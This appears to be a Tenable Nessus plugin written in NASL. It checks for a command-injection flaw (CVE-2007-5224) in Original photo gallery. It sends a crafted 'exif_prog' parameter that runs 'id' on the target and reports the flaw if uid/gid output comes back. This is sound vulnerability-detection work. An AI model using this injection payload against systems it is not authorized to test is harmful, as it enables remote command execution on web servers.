#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows arbitrary
command execution. 

Description :

Original photo gallery, a PHP-based photo gallery, is installed on the
remote host. 

The version of Original photo gallery on the remote host fails to
sanitize input to the 'exif_prog' parameter of the 'inc/exif.inc.php'
script before using it in an 'exec()' statement to execute a command. 
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can leverage this issue to execute arbitrary
code on the remote host subject to the privileges of the web server
user id. 

See also :

http://www.securityfocus.com/archive/1/481316/30/0/threaded

Solution :

Upgrade to Original photo gallery 0.11.3 or later. 

Risk factor :

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(26199);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-5224");
  script_bugtraq_id(25896);

  script_name(english:"Original exif_prog Parameter Command Execution Vulnerability");
  script_summary(english:"Tries to run a command via Original's exif.inc.php");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/gallery", "/photos", "/original", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to run a command.
  cmd = "id";
  exploit = string("(echo -n '", SCRIPT_NAME, ": ';", cmd, ")||echo");

  req = http_get(
    item:string(
      dir, "/inc/exif.inc.php?",
      "exif_prog=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
  if (line && ">uid" >< line && " |<a href" >< line)
  {
    line = strstr(line, ">uid") - ">";
    line = line - strstr(line, " |<a href");
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "It was possible to execute the command '", cmd, "' on the remote host,\n",
      "which produces the following output :\n",
      "\n",
      "  ", line
    );
    security_warning(port:port, data:report);
    exit(0);
  }
}
